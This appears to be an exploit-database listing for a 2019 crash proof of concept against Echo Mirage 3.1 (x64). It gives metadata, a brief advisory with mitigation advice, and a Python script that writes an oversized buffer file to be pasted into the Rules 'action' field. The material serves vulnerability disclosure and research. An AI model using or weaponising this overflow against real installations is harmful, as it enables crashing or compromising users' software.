Echo Mirage 3.1 Buffer Overflow PoC (Stack Overflow)

vendor:

Echo Mirage

by:

InitD Community

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Echo Mirage

Affected Version From: 3.1 (x64)

Affected Version To: 3.1 (x64)

Patch Exists: NO

Related CWE: N/A

CPE: a:echomirage:echo_mirage:3.1

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7

2019

Echo Mirage 3.1 Buffer Overflow PoC (Stack Overflow)

A buffer overflow vulnerability exists in Echo Mirage 3.1 (x64) when a maliciously crafted file is opened. An attacker can exploit this vulnerability to execute arbitrary code in the context of the current user. To exploit this vulnerability, an attacker must entice a user to open a maliciously crafted file. The maliciously crafted file must contain a buffer of 24241 A's, 8 B's and 50 C's.

Mitigation:

Users should avoid opening files from untrusted sources. Additionally, users should ensure that they are running the latest version of Echo Mirage 3.1 (x64).

Source

Exploit-DB raw data:

#!/usr/bin/python

# Exploit Title: Echo Mirage 3.1 Buffer Overflow PoC (Stack Overflow)
# Date: 21-01-2019
# Software Link: https://sourceforge.net/projects/echomirage.oldbutgold.p/
# Version: 3.1 (x64)
# Exploit Author: InitD Community
# Contact: https://twitter.com/initd_sh
# Website: http://initd.sh/
# Tested on: Windows 7


"""
Step to Reproduce : Open Echo Mirage --> 1) Click on "Rules" --> 2) click on "New" --> 3)Copy "Echo-Mirage-BoF-POC.txt" content and Paste  in "action" field. --> BOoo0m.

Thanks: Touhid M.Shaikh(@touhidshaikh22), Shrutirupa(@creak_crypt)
This Bug Identified by Touhid M.Shaikh
"""

buffer = "A"*24241

RBP = "B"*8

PAD = "C"*50

evil = buffer + RBP + PAD


evil_file = open("Echo-Mirage-BoF-POC.txt","w")

evil_file.write(evil)

evil_file.close()